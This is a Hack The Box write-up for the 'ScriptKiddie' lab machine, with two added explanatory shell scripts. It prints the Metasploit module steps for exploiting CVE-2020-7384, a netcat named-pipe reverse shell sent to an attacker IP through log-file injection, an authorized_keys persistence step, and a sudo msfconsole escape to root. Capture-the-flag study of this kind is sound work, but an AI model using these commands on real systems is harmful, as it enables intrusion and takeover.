Hack The Box — Script Kiddie — Write up

Lovelesh Gangil
5 min read · Jun 10, 2021

ScriptKiddie is an easy-difficulty Linux machine that presents a Metasploit vulnerability (CVE-2020-7384), along with classic attacks such as OS command injection and an insecure passwordless sudo configuration. The initial foothold is gained by uploading a malicious .apk file to a web interface that calls a vulnerable version of msfvenom to generate downloadable payloads. Once a shell is obtained, lateral movement to a second user is performed by injecting commands into a log file that provides unsanitised input to a Bash script triggered on file modification. This user is allowed to run msfconsole as root via sudo without supplying a password, resulting in privilege escalation.

Enumeration

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1249.13 seconds

Nmap shows OpenSSH listening on its default port (22). Additionally, a Werkzeug httpd server is listening on port 5000.

HTTP

The web server on port 5000 returns a page titled k1d'5 h4ck3r t00l5 that wraps a few attack tools behind web forms.

The nmap section allows us to run a port scan (top 100 ports) on a given IP address. Running nmap on 127.0.0.1 does not provide any additional information (only ports 22 and 5000 are shown):

The sploits section passes the input to searchsploit and presents the results:

No vulnerabilities are found on either the nmap or the sploits interface.

The payloads section allows us to select an operating system (windows, linux or android), to provide an lhost address and, optionally, to upload a template file. Clicking the generate button passes our input to msfvenom; on success, a link to the downloadable payload is returned:

Foothold

A quick web search shows that Metasploit Framework versions up to and including 6.0.11 are affected by an APK template command injection in msfvenom (CVE-2020-7384): when an APK is supplied as a template, msfvenom reads the template's signing-certificate subject with keytool and interpolates it, unescaped, into the shell command used to generate the new signing key, so shell metacharacters placed in that subject are executed. The web interface never reveals which Metasploit version is installed, but since it lets us upload an APK template and runs msfvenom on it, the exploit is worth trying. We use the Metasploit module from msfconsole to generate a malicious APK template (LHOST and LPORT are set to our VPN IP address and listening port respectively; the module writes the file to ~/.msf4/local/msf.apk by default):
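The target never reveals its Metasploit version, but once a shell is obtained the line printed by msfconsole --version (of the form Framework Version: 6.0.9-dev) can be compared against the fix to confirm the box really was in the affected range. The snippet below is an added example, not part of the original write-up or of Metasploit itself; it assumes that 6.0.12 is the first fixed release (so 6.0.11 and earlier are affected, as stated above) and uses a constructed version line as sample input.

```shell
#!/bin/sh
# Added example (not from the write-up or from Metasploit): classify a
# Metasploit version string against the CVE-2020-7384 fix. Assumption:
# 6.0.12 is the first fixed release, so anything below it is affected.

CVE_2020_7384_FIXED="6.0.12"

# Pull "major.minor.patch" out of a line such as "Framework Version: 6.0.9-dev".
# Suffixes like "-dev" are dropped. Fails (status 1) if no version is present.
msf_parse_version() {
    v=$(printf '%s\n' "$1" | sed -n 's/^[^0-9]*\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ -n "$v" ] || return 1
    printf '%s\n' "$v"
}

# Return 0 if dotted version $1 is lower than $2 (compares up to three components).
version_lt() {
    a=$1 b=$2 i=0
    while [ "$i" -lt 3 ]; do
        x=${a%%.*} y=${b%%.*}
        [ "${x:-0}" -lt "${y:-0}" ] && return 0
        [ "${x:-0}" -gt "${y:-0}" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
        i=$((i + 1))
    done
    return 1
}

# Status 0 = affected, 1 = patched or undetermined.
msf_affected_by_cve_2020_7384() {
    v=$(msf_parse_version "$1") || return 1
    version_lt "$v" "$CVE_2020_7384_FIXED"
}

# Constructed sample line, in the format `msfconsole --version` prints.
sample="Framework Version: 6.0.9-dev"
if msf_affected_by_cve_2020_7384 "$sample"; then
    echo "$sample: affected by CVE-2020-7384"
else
    echo "$sample: not in the affected range"
fi
```

On the target this would be run as msfconsole --version | while read -r line; do msf_affected_by_cve_2020_7384 "$line"; done after sourcing the functions; the comparison is numeric per component, so 6.0.9 correctly sorts below 6.0.12 even though it is lexically larger.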

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 7777
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

We open a netcat listener on the specified LPORT :

nc -lnvp 7777

We upload the msf.apk file and select android as the operating system:

After clicking generate, a reverse shell as the kid user connects back to our listener:

We can write our public key to ~/.ssh/authorized_keys to obtain persistent SSH access:

echo "ssh-rsa [...]" >> ~/.ssh/authorized_keys
ssh kid@10.10.10.226

The user flag can be found in /home/kid/user.txt .

Lateral Movement

Basic enumeration reveals the existence of another user called pwn. A world-readable scanlosers.sh script is found in pwn's home directory:

find /home/pwn -type f -readable -ls 2>/dev/null

The next step is escalating to pwn, who has more privileges. While exploring the system I came across a file named hackers (the log at /home/kid/logs/hackers). What caught my attention was its group owner: the file belongs to group pwn, and it is the log that the scanlosers.sh script found above consumes.

Since the script feeds the log's contents to a shell without sanitising them, appending a command to the file gets us code execution as pwn. The line used (a netcat reverse shell through a named pipe, run from the directory containing hackers):

echo "rm -f /tmp/p; mknod /tmp/p p && nc 10.10.14.102 4444 0</tmp/p | /bin/sh >/tmp/p" >> hackers

Before appending the line, start the listener again, this time on port 4444. When the script processes the log, a shell as pwn arrives on the listener.
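To show why appending a line to the log is enough, here is an added example in shell; it is not the box's scanlosers.sh and not code from the write-up. It models the pattern I assume the real script follows (the script itself is not reproduced above): each log line is kept from the third space-separated field onward as an "ip" and interpolated unquoted into sh -c "nmap --top-ports 10 ... $ip ...". That is also why the rm -f at the start of the payload above is harmless: those are the two fields the script discards. nmap is replaced by echo so the example runs anywhere, the injected command is a harmless touch, and the sample log lines are constructed. The hardened variant beside it shows the fix: validate the field as a dotted quad and pass it as a single argument instead of through a second shell.

```shell
#!/bin/sh
# Added example (not the box's scanlosers.sh, not from the write-up): a minimal
# model of the log-processing bug behind the lateral movement. Assumed behaviour
# of the real script: it reads the hackers log, keeps each line from the third
# space-separated field onward as an "ip", and interpolates that value unquoted
# into `sh -c "nmap --top-ports 10 ... $ip ..."`. nmap is replaced by echo here.

# Vulnerable model: attacker-controlled text is re-parsed by a second shell.
# $1 = path to the log; the "scan" commands go to stdout.
scan_losers_vuln() {
    cut -d' ' -f3- "$1" | sort -u | while read -r ip; do
        sh -c "echo nmap --top-ports 10 $ip"
    done
}

# Hardened model: reject anything that is not digits and dots before use, and
# hand the value over as one argument instead of building a command string.
scan_losers_safe() {
    cut -d' ' -f3- "$1" | sort -u | while read -r ip; do
        case $ip in
            ""|*[!0-9.]*) continue ;;   # spaces, ; | $ ( ) ` etc. are all rejected
        esac
        printf 'nmap --top-ports 10 %s\n' "$ip"
    done
}

# Demo with a constructed log: one honest entry and one injected entry.
# The leading two fields ("10.10.14.1 kid") are what cut -f3- discards, which is
# why an injected line needs two throwaway words before the payload.
demo_dir=$(mktemp -d)
printf '%s\n' \
    "10.10.14.1 kid 10.10.10.5" \
    "10.10.14.1 kid 10.10.10.5; touch $demo_dir/pwned #" > "$demo_dir/hackers"

scan_losers_vuln "$demo_dir/hackers" > "$demo_dir/vuln.out"
[ -e "$demo_dir/pwned" ] && echo "vulnerable loop: injected touch ran as the script's user"
rm -f "$demo_dir/pwned"

scan_losers_safe "$demo_dir/hackers" > "$demo_dir/safe.out"
[ -e "$demo_dir/pwned" ] || echo "hardened loop: injected line rejected, honest line scanned"
rm -rf "$demo_dir"
```

The real script additionally uses the value inside an output filename (-oN recon/...), so even a value that is a valid IP needs to be a single token; the dotted-quad filter above covers that as well. The reverse-shell payload in the write-up works for the same reason the touch does: everything after the discarded fields becomes part of the command line that sh -c executes.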

Next, I checked the sudo rules for this user and realised that pwn can run msfconsole as root without a password.

So I ran sudo msfconsole and typed /bin/bash at the msf6 prompt. msfconsole hands commands it does not recognise to the system shell, so this opens a root shell, from which the root flag can be read. Any NOPASSWD sudo rule for a tool that can spawn a shell is equivalent to granting root outright.

Visit My Hack The Box Profile —

https://app.hackthebox.eu/profile/464208

For any queries, contact me on my Twitter and LinkedIn profiles:

https://twitter.com/loveleshgangil


Lovelesh Gangil

Offensive Security | Digital Forensics and Incident Response (DFIR) | CAP | GPCSSI '21 | ICSI (CNSS) | CEH (Practical)